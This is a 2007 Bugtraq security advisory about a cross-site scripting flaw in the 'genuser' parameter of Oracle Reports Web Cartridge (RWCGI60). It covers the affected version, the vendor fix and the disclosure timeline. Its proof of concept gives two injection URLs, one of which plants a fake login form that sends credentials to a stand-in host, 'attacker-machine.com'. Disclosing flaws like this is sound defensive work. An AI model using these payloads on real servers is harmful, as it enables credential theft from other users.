Bugtraq mailing list archives
[ISecAuditors Security Advisories] Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS
From: ISecAuditors Security Advisories <advisories () isecauditors com>
Date: Wed, 17 Jan 2007 19:49:54 +0100
============================================= INTERNET SECURITY AUDITORS ALERT 2007-001 - Original release date: January 17, 2007 - Last revised: January 17, 2007 - Discovered by: Vicente Aguilera Diaz - Severity: 3/5 ============================================= I. VULNERABILITY ------------------------- Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS. II. BACKGROUND ------------------------- The Reports Web CGI or Web Cartridge is required for the Reports Server when using the Oracle Application Server (OAS) to process report requests from Web clients. III. DESCRIPTION ------------------------- Improper validation in "genuser" parameter allows to inject arbitrary code script/HTML that will be executed in the client browser. This is specially serious in authentication forms where a malicious user can obtain the credentials of authentication of other users. IV. PROOF OF CONCEPT ------------------------- URL original: http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server> This request return a page with an authentication form (with User Name, Password, and Database fields). With a POST method (the rwcgi60 accept both methods: GET and POST), the user send: username=&password=&database=&authtype=D&genuser=&server=<oracle-reports-server>&nextpage=<next-page> A malicious user can modify the value of the "genuser" parameter and inject arbitrary script/HTML code: -- Example 1 --- http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=User Name<script>alert('Vulnerable to XSS attack!');</script> --- Example 2 --- http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=</form><form name='AttackerForm' action='http://attacker-machine.com/credentials'>User Name V. BUSINESS IMPACT ------------------------- An attacker can spoof the session of other authenticated users, obtains his authentication credentials, or deface the authentication form page. VI. SYSTEMS AFFECTED ------------------------- Oracle9i Application Server Release 2, version 9.0.2.3 VII. SOLUTION ------------------------- The January 2007 CPU (Critical Patch Update) contain fixes for this vulnerability. VIII. REFERENCES ------------------------- - http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- January 17, 2007: Initial release XI. DISCLOSURE TIMELINE ------------------------- April 23, 2006: Vulnerability acquired by Internet Security Auditors April 24, 2006: Initial vendor notification sent. April 29, 2006: Initial response of the vendor January 16, 2007: The vendor fixed the vulnerability in the CPU. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.
Current thread:
- [ISecAuditors Security Advisories] Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS ISecAuditors Security Advisories (Jan 17)